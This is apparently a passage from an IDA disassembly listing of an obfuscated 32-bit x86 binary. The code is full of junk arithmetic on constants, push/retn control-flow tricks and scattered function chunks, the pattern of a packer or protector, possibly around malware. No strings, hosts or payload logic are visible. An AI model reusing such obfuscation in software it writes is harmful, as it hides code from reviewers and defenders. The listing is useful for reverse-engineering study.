; START OF FUNCTION CHUNK FOR sub_42E695
loc_42F1B1: ; CODE XREF: sub_42E695-230C�j
rol eax, 8
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42F1B6: ; CODE XREF: sub_423752+49E0�j
jmp loc_42E216
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
loc_42F1BB: ; CODE XREF: _7hdaygc1:00424235�j
jmp loc_42BF6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E21
loc_42F1C0: ; CODE XREF: sub_425E21-1EA8�j
push ecx
jmp loc_42A7DA
; END OF FUNCTION CHUNK FOR sub_425E21
; =============== S U B R O U T I N E =======================================
sub_42F1C6 proc near ; CODE XREF: _7hdaygc1:00424009�j
; sub_423172:loc_429DBA�p
; FUNCTION CHUNK AT 00426BB0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428D80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042934C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A5D2 SIZE 0000001E BYTES
xchg edi, [esp+0]
pop edi
add eax, 0FB5C9C36h
add eax, ebp
add eax, 7C6E2B7Dh
jmp loc_428D80
sub_42F1C6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E4B2
loc_42F1DD: ; CODE XREF: sub_42E4B2+7�j
push offset sub_42E90A
jmp nullsub_115
; END OF FUNCTION CHUNK FOR sub_42E4B2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42F1E7 proc near ; CODE XREF: sub_42AFB3-48C0�j
retn
sub_42F1E7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42F1E8: ; CODE XREF: sub_423DDB+B988�j
or ebp, esi
jl loc_42E163
rol ecx, 11h
sbb ecx, 0BF5C68D1h
loc_42F1F9: ; CODE XREF: sub_423DDB+B97C�j
add esi, 74351AB0h
jmp loc_428480
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_42F204: ; CODE XREF: sub_42C209:loc_423512�j
xor edi, ebx
jmp loc_42FCF8
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42F20B: ; CODE XREF: sub_423752:loc_423839�j
and eax, 0FFFh
add [esi], eax
xor [esi], edx
loc_42F214: ; CODE XREF: _7hdaygc1:0042B926�j
push eax
push 365D87ACh
pop eax
jmp loc_42E122
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8F6
loc_42F220: ; CODE XREF: sub_42F8F6:loc_425F87�j
lea eax, loc_428208
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
push 0
push 0
call sub_42B942
; END OF FUNCTION CHUNK FOR sub_42F8F6
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42F235: ; CODE XREF: sub_42C443:loc_42B362�j
jmp loc_42E04C
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
loc_42F23A: ; CODE XREF: _7hdaygc1:0042CCA2�j
mov esi, 9BF05ACAh
loc_42F23F: ; CODE XREF: _7hdaygc1:loc_42829D�j
mov eax, 400h
loc_42F244: ; CODE XREF: _7hdaygc1:00427007�j
push esi
push 0B143E94Fh
pop esi
or esi, 7A50B3BCh
test esi, 20000h
; START OF FUNCTION CHUNK FOR sub_4295F7
loc_42F257: ; CODE XREF: sub_4295F7:loc_429613�j
jmp loc_42E8DD
; END OF FUNCTION CHUNK FOR sub_4295F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42742E
loc_42F25C: ; CODE XREF: sub_42742E-27E0�j
pop esi
add esi, 27BD4EEAh
xor esi, 0D27B7267h
add esi, 28CB167Ch
xchg esi, [esp+4+var_4]
jmp loc_42A792
; END OF FUNCTION CHUNK FOR sub_42742E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42F277: ; CODE XREF: sub_425E64:loc_427879�j
jl loc_42C7A5
loc_42F27D: ; CODE XREF: _7hdaygc1:00429AE3�j
jmp loc_42D72D
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
or eax, edx
jnz loc_42C9D3
cmp ebx, edi
jmp loc_42C797
; =============== S U B R O U T I N E =======================================
sub_42F291 proc near ; CODE XREF: sub_424A2B+3�p
; _7hdaygc1:004266E9�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00429E9C SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042F823 SIZE 0000000F BYTES
xchg ecx, [esp+0]
pop ecx
xchg ebp, [esp-4+arg_0]
push 3CF86AAEh
pop eax
rol eax, 14h
sub eax, 0BB335688h
jmp loc_42F823
sub_42F291 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_42F2AC: ; CODE XREF: sub_42CCDD:loc_42B2F1�j
add eax, 9A8E2ECFh
sub esi, 2D83B648h
jmp loc_42FD3D
; END OF FUNCTION CHUNK FOR sub_42CCDD
; ---------------------------------------------------------------------------
loc_42F2BD: ; CODE XREF: _7hdaygc1:00428887�j
pop edi
or edi, 0F09F9E01h
test edi, 10000000h
jmp loc_42B2A4
; ---------------------------------------------------------------------------
mov esi, 1301ECA9h
js loc_426577
jmp sub_42821A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_42F2DF: ; CODE XREF: sub_424A2B:loc_42C2F6�j
jnz loc_4242FC
push offset sub_42D5F1
jmp nullsub_119
; END OF FUNCTION CHUNK FOR sub_424A2B
; ---------------------------------------------------------------------------
push eax
ror eax, 19h
push edi
push 755813D8h
pop edi
xor edi, 34BFCBA6h
sub edi, 41F6ED41h
jmp loc_42F603
; ---------------------------------------------------------------------------
locret_42F30B: ; CODE XREF: _7hdaygc1:00426003�j
retn
; ---------------------------------------------------------------------------
loc_42F30C: ; CODE XREF: _7hdaygc1:0042DCB9�j
pop ebp
; =============== S U B R O U T I N E =======================================
sub_42F30D proc near ; CODE XREF: sub_42C002+A�p
; FUNCTION CHUNK AT 004239C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426482 SIZE 00000002 BYTES
xchg ebx, [esp+0]
pop ebx
mov [esi], eax
jmp loc_4239C5
sub_42F30D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42F318: ; CODE XREF: _7hdaygc1:0042EECA�j
jnz loc_424E44
; =============== S U B R O U T I N E =======================================
sub_42F31E proc near ; CODE XREF: sub_42C7F3+1422�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042D7E1 SIZE 00000015 BYTES
xchg edx, [esp+0]
pop edx
xchg eax, [esp+0]
mov [ebp-4], eax
mov eax, 100h
call sub_42828C
mov ebx, eax
jmp loc_42D7E1
sub_42F31E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ebx, [ecx]
jmp sub_42D002
; ---------------------------------------------------------------------------
loc_42F340: ; DATA XREF: _7hdaygc1:0042423A�o
mov eax, 100h
loc_42F345: ; CODE XREF: _7hdaygc1:loc_428AF1�j
call sub_42828C
mov ebx, eax
call sub_428C3B
xor ebx, eax
push eax
push 25C0F1AFh
pop eax
rol eax, 12h
xor eax, 608C1EB9h
jmp loc_423E61
; ---------------------------------------------------------------------------
call sub_42B877
; START OF FUNCTION CHUNK FOR sub_425BFC
loc_42F36D: ; CODE XREF: sub_425BFC+6�j
jmp loc_42C530
; END OF FUNCTION CHUNK FOR sub_425BFC
; ---------------------------------------------------------------------------
locret_42F372: ; CODE XREF: _7hdaygc1:00424579�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42F373: ; CODE XREF: sub_423648+5A7A�j
jmp loc_42BA1B
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
loc_42F378: ; CODE XREF: _7hdaygc1:00429DF2�j
push 30645B31h
loc_42F37D: ; CODE XREF: _7hdaygc1:loc_429DE1�j
add eax, 5123775Dh
add eax, ebp
add eax, 6A885DB3h
mov eax, [eax]
call sub_424588
loc_42F392: ; CODE XREF: _7hdaygc1:0042B2AC�j
jb loc_429AAE
xchg ebx, edx
loc_42F39A: ; CODE XREF: _7hdaygc1:loc_42B2A4�j
rol edi, 1Ah
or edi, 44A77BD7h
xor edi, 0E5C8E80Ah
add ebp, edi
push ebx
jmp loc_4287AB
; ---------------------------------------------------------------------------
xor edx, edx
mov eax, [ebp-4]
push edi
push 9BD158F6h
pop edi
and edi, 73D2A2B8h
jmp loc_42D40B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F3C8 proc near ; CODE XREF: sub_42EF3C+7�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00423AEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004242B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425C07 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CD94 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042DA65 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042EA29 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FBB1 SIZE 00000005 BYTES
push esi
loc_42F3C9: ; CODE XREF: _7hdaygc1:0042488F�j
mov esi, edi
xchg esi, [esp+0]
mov edi, ebp
loc_42F3D0: ; CODE XREF: _7hdaygc1:0042BFF4�j
xchg edi, [esp+0]
mov ebp, esp
push ebx
jmp loc_42FBB1
sub_42F3C8 endp
; ---------------------------------------------------------------------------
xchg esi, edx
jmp sub_423F3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428079
loc_42F3E2: ; CODE XREF: sub_428079-3448�j
push 0
push offset sub_42DA74
jmp nullsub_186
; END OF FUNCTION CHUNK FOR sub_428079
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240B0
loc_42F3EE: ; CODE XREF: sub_4240B0+8�j
call sub_427D8E
cmp ds:dword_427CA0, 0
jnz loc_42C72A
lea edx, [ebp-14h]
mov eax, offset dword_427CB0
jmp loc_424D9C
; END OF FUNCTION CHUNK FOR sub_4240B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_42F40D: ; CODE XREF: sub_42DAD9:loc_42A5F1�j
or dword ptr [eax-8], 8
; END OF FUNCTION CHUNK FOR sub_42DAD9
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42F411: ; CODE XREF: _7hdaygc1:00423368�j
; sub_42C443-46EB�j ...
js loc_424EE5
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4239BA
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jmp loc_42358F
; END OF FUNCTION CHUNK FOR sub_42C443
; =============== S U B R O U T I N E =======================================
sub_42F436 proc near ; CODE XREF: sub_429BD4:loc_429BD8�p
; _7hdaygc1:0042B91B�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425EFB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B9A4 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
add eax, eax
cdq
jmp loc_42B9A4
sub_42F436 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C369
loc_42F442: ; CODE XREF: sub_42C369-1887�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42C369
; ---------------------------------------------------------------------------
loc_42F446: ; CODE XREF: _7hdaygc1:0042E36B�j
jmp locret_424D9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_42F44B: ; CODE XREF: sub_4282A9+32BE�j
; sub_42FD11+7�j
push 0C73420F2h
pop eax
jmp loc_425573
; END OF FUNCTION CHUNK FOR sub_42FD11
; ---------------------------------------------------------------------------
loc_42F456: ; CODE XREF: _7hdaygc1:00424038�j
; DATA XREF: sub_423DFC+4FBD�o
add edx, [ebp-4]
add eax, edx
call sub_429968
; START OF FUNCTION CHUNK FOR sub_42450E
loc_42F460: ; CODE XREF: sub_42450E+2782�j
jmp loc_42D2A5
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
loc_42F465: ; CODE XREF: _7hdaygc1:0042543C�j
adc ebp, ebx
; =============== S U B R O U T I N E =======================================
sub_42F467 proc near ; CODE XREF: _7hdaygc1:0042391F�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042E823 SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
push 1
push 0
push 12B66D36h
xchg esi, [esp+8+var_8]
jmp loc_42E823
sub_42F467 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F528
loc_42F47D: ; CODE XREF: sub_42F528+C�j
jmp loc_428F95
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF30
loc_42F482: ; CODE XREF: sub_42EF30+1�j
jmp loc_42866D
; END OF FUNCTION CHUNK FOR sub_42EF30
; ---------------------------------------------------------------------------
loc_42F487: ; CODE XREF: _7hdaygc1:004270CF�j
jmp loc_42DBC2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42F48C: ; CODE XREF: sub_4273CA+5058�j
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
jmp loc_42A64E
; ---------------------------------------------------------------------------
loc_42F49D: ; CODE XREF: sub_4273CA:loc_423AC0�j
push offset sub_427455
jmp loc_428C2C
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42F4A7: ; CODE XREF: sub_42AA47+475A�j
xor eax, 4B148E5Dh
add eax, ebp
push edi
push 5AE1BAAEh
pop edi
or edi, 3D7B992Ah
cmp edi, 0F36FB813h
jmp loc_42EB48
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
cmp esi, ebx
jmp loc_42E638
; =============== S U B R O U T I N E =======================================
sub_42F4CE proc near ; CODE XREF: _7hdaygc1:004293CE�p
; _7hdaygc1:0042C9B1�j
; FUNCTION CHUNK AT 00423350 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428ADB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00428F81 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F8B4 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
test al, al
jz loc_42C933
jmp loc_428F81
sub_42F4CE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42F4DF: ; DATA XREF: sub_42C443-53B2�o
xchg edx, [esp]
push edx
push 7F3319ACh
pop edx
jmp loc_42DB33
; ---------------------------------------------------------------------------
loc_42F4EE: ; CODE XREF: _7hdaygc1:00428C63�j
; _7hdaygc1:loc_429434�j
shr edi, 1
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42F4F0: ; CODE XREF: sub_425A37:loc_42BA05�j
add ebx, 449B0105h
add eax, ebx
pop ebx
call sub_425C3B
loc_42F4FE: ; CODE XREF: sub_42ABE3+7�j
jmp nullsub_3
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_42F503: ; CODE XREF: sub_42A052+12�j
jmp loc_42B96F
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CA9
loc_42F508: ; CODE XREF: sub_425CA9+D�j
call sub_42DBEA
push offset loc_429086
jmp loc_427F4F
; END OF FUNCTION CHUNK FOR sub_425CA9
; ---------------------------------------------------------------------------
js loc_429511
jmp sub_42C6A0
; ---------------------------------------------------------------------------
loc_42F522: ; CODE XREF: _7hdaygc1:0042FC04�j
or edi, 67BB7B54h
; =============== S U B R O U T I N E =======================================
sub_42F528 proc near ; CODE XREF: sub_42B470-51CB�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004239CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425400 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426764 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F95 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D4D0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042E9C1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042F47D SIZE 00000005 BYTES
xchg ecx, [esp+8+var_8]
pop ecx
or eax, eax
jnz loc_42E9C1
jmp loc_42F47D
sub_42F528 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0E2
loc_42F539: ; CODE XREF: sub_42E0E2+12�j
sub edx, 3BC6E4D4h
add edx, 3D0A575Fh
xchg edx, [esp+4+var_4]
jmp sub_42D85F
; END OF FUNCTION CHUNK FOR sub_42E0E2
; ---------------------------------------------------------------------------
xor edx, ebp
jmp sub_426B1A
; =============== S U B R O U T I N E =======================================
sub_42F554 proc near ; CODE XREF: _7hdaygc1:004251A0�j
; sub_424744+5146�p
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
add esi, 0FF12DA49h
xchg esi, [esp-4+arg_0]
jmp sub_42D757
sub_42F554 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
popf
jmp loc_42A4C0
; =============== S U B R O U T I N E =======================================
sub_42F56C proc near ; CODE XREF: sub_42B470:loc_4234A1�j
; sub_42B470+3430�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423CE7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423E52 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042921A SIZE 00000005 BYTES
push ebp
call sub_429C1F
loc_42F572: ; CODE XREF: _7hdaygc1:00426E76�j
ja loc_42921A
adc edx, 65D0ACE3h
jmp loc_42B77C
sub_42F56C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9CB
loc_42F583: ; CODE XREF: sub_42D9CB+A�j
mov ebp, edx
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_42D9CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42F587: ; CODE XREF: sub_425752+E�j
push offset sub_42450E
jmp loc_42FBAC
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
loc_42F591: ; CODE XREF: _7hdaygc1:loc_42EC5C�j
xor edi, 0C686AA23h
cmp edi, 9EFE3E09h
jmp loc_42B79B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42F5A2: ; CODE XREF: sub_42C50D�j
call sub_42B0DC
; END OF FUNCTION CHUNK FOR sub_42C50D
; START OF FUNCTION CHUNK FOR sub_42B9E1
loc_42F5A7: ; CODE XREF: sub_42B9E1+15�j
jmp loc_42853B
; END OF FUNCTION CHUNK FOR sub_42B9E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42F5AC: ; CODE XREF: sub_42AA47+4EA�j
jmp loc_4250B3
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
loc_42F5B1: ; CODE XREF: _7hdaygc1:00424875�j
jmp locret_426C9C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42F5B6: ; CODE XREF: sub_42EBD6+D�j
jnz loc_42E4F1
jmp loc_42975A
; END OF FUNCTION CHUNK FOR sub_42EBD6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB0F
loc_42F5C2: ; CODE XREF: sub_42AB0F-5908�j
jmp nullsub_126
; END OF FUNCTION CHUNK FOR sub_42AB0F
; ---------------------------------------------------------------------------
loc_42F5C7: ; CODE XREF: _7hdaygc1:0042FB85�j
xchg edx, [esp]
pop edx
mov ds:dword_425158, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B32F
loc_42F5D2: ; CODE XREF: sub_42B32F:loc_42B84C�j
; sub_42E41D+4�j
rol eax, 4
push eax
call sub_42B650
loc_42F5DB: ; CODE XREF: _7hdaygc1:loc_428D97�j
jmp nullsub_127
; END OF FUNCTION CHUNK FOR sub_42B32F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42F5E1: ; CODE XREF: _7hdaygc1:00428CB1�j
pop esi
sub edx, 13D74A3Bh
or edx, 1EA911E7h
call sub_42E5AE
; START OF FUNCTION CHUNK FOR sub_42C48C
loc_42F5F3: ; CODE XREF: sub_42C48C+1DBA�j
jmp loc_4258AC
; END OF FUNCTION CHUNK FOR sub_42C48C
; ---------------------------------------------------------------------------
loc_42F5F8: ; CODE XREF: _7hdaygc1:loc_42FD4B�j
jnz loc_428620
jmp loc_424A21
; ---------------------------------------------------------------------------
loc_42F603: ; CODE XREF: _7hdaygc1:0042F306�j
or edi, 6E0498DEh
add edi, 4DE935h
mov [edi], eax
pop edi
jmp locret_4280E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D8E
loc_42F617: ; CODE XREF: sub_427D8E:loc_4271B5�j
call sub_42F621
loc_42F61C: ; CODE XREF: sub_42E90A+C�j
jmp loc_424A38
; END OF FUNCTION CHUNK FOR sub_427D8E
; =============== S U B R O U T I N E =======================================
sub_42F621 proc near ; CODE XREF: _7hdaygc1:0042B42C�j
; sub_427D8E:loc_42F617�p
; FUNCTION CHUNK AT 00424799 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004253E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042561F SIZE 00000025 BYTES
xchg ebx, [esp+0]
pop ebx
add edx, ebp
add edx, 0FE5D5D6Eh
mov eax, offset dword_42B9BC
call sub_42AA07
push 570215F0h
pop eax
jmp loc_42561F
sub_42F621 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42F642 proc near ; DATA XREF: sub_42BEC6-65B1�o
; FUNCTION CHUNK AT 00425113 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426459 SIZE 00000018 BYTES
push esi
pushf
push 0A4608C53h
or esi, 4671BB8Dh
jmp loc_426459
sub_42F642 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42F654: ; CODE XREF: _7hdaygc1:00429DB5�j
jg loc_4298CA
; =============== S U B R O U T I N E =======================================
sub_42F65A proc near ; CODE XREF: sub_42F1C6-5E79�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004248FC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424D35 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425D98 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042857B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B78 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429BFC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A750 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042A787 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B29A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B52F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042C3B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C88E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042D061 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DB65 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042E8D6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042F0E9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042F83B SIZE 0000001D BYTES
xchg edi, [esp+0]
loc_42F65D: ; CODE XREF: sub_42BAE7-1C75�j
pop edi
mov ecx, 0F8h
call sub_42A94C
jmp loc_425D98
sub_42F65A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42F66D: ; CODE XREF: sub_4268D9-273B�j
jl loc_42611B
sbb ebx, esi
jmp loc_4240BD
; END OF FUNCTION CHUNK FOR sub_4268D9
; =============== S U B R O U T I N E =======================================
sub_42F67A proc near ; CODE XREF: _7hdaygc1:00423AD0�j
; sub_42C3E4-D5A�p
xchg ecx, [esp+0]
pop ecx
jz loc_42B644
call nullsub_3
jmp loc_423AC0
sub_42F67A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42F68E proc near ; CODE XREF: sub_42C1AF:loc_42BA89�j
add esp, 0FFFFFED8h
mov [ebp-8], edx
jmp loc_42AC7A
sub_42F68E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42F69C: ; CODE XREF: sub_4288FE+14�j
jz loc_426CA2
jmp loc_42EEF8
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423D6F
loc_42F6A7: ; CODE XREF: sub_423D6F+A�j
xchg edi, [esp+0]
push esi
call sub_425E21
; END OF FUNCTION CHUNK FOR sub_423D6F
; START OF FUNCTION CHUNK FOR sub_427F72
loc_42F6B0: ; CODE XREF: sub_427F72-3496�j
jmp loc_426928
; END OF FUNCTION CHUNK FOR sub_427F72
; ---------------------------------------------------------------------------
loc_42F6B5: ; CODE XREF: _7hdaygc1:004281C4�j
rol eax, 3
jmp sub_42FA48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42F6BD: ; CODE XREF: _7hdaygc1:0042886D�j
; sub_42A17C:loc_42DBD1�j
push 5FFD80B9h
sbb esi, 5397FAF0h
jmp loc_42AF83
; END OF FUNCTION CHUNK FOR sub_42A17C
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_42F6CD proc near ; CODE XREF: sub_429A26:loc_427ED3�j
; _7hdaygc1:0042B275�j
retn
sub_42F6CD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42F6CE: ; CODE XREF: sub_423DFC+6551�j
jmp nullsub_131
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42F6D3: ; CODE XREF: sub_4268D9-7C4�j
; sub_42C443-53AD�j
jmp nullsub_132
; END OF FUNCTION CHUNK FOR sub_4268D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_42F6D8: ; CODE XREF: sub_428B11:loc_42B4BF�j
; sub_428B11+3789�j
mov eax, [ebp-4]
cmp dword ptr [eax], 0
jz loc_4270F0
jmp loc_42723D
; END OF FUNCTION CHUNK FOR sub_428B11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42F6E9: ; CODE XREF: sub_423172+347E�j
push 6E7F2754h
jmp loc_428DCA
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
push 0EBEC0ED9h
pop eax
or eax, 31703234h
jmp loc_42C884
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289CE
loc_42F704: ; CODE XREF: sub_4289CE:loc_4293C9�j
jz loc_42D56E
loc_42F70A: ; CODE XREF: _7hdaygc1:0042AA40�j
jmp loc_425E82
; END OF FUNCTION CHUNK FOR sub_4289CE
; ---------------------------------------------------------------------------
db 56h
dd 8A0FCF23h, 0FFFFC67Dh
; ---------------------------------------------------------------------------
loc_42F718: ; CODE XREF: _7hdaygc1:loc_42C797�j
jmp loc_42BC21
; ---------------------------------------------------------------------------
add esi, 2B90EE90h
jmp sub_428120
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42F729: ; CODE XREF: _7hdaygc1:loc_42A248�j
push 0FFFFFFFFh
push eax
push edx
push 1F25135Ah
jmp loc_42BFE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DDA
loc_42F737: ; CODE XREF: sub_427DDA:loc_428179�j
mov eax, [ebp-4]
call sub_42EBB3
; END OF FUNCTION CHUNK FOR sub_427DDA
; START OF FUNCTION CHUNK FOR sub_42DBAE
loc_42F73F: ; CODE XREF: sub_42DBAE+F�j
jmp nullsub_173
; END OF FUNCTION CHUNK FOR sub_42DBAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AD16
loc_42F745: ; CODE XREF: sub_42AD16-1366�j
jmp nullsub_133
; END OF FUNCTION CHUNK FOR sub_42AD16
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42F74A: ; CODE XREF: sub_423DDB:loc_424256�j
pop esi
sub esi, 8E6E1A81h
and esi, 0AD2DBE3Eh
jnz loc_42F1F9
jg loc_42CF0E
jmp loc_42F1E8
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
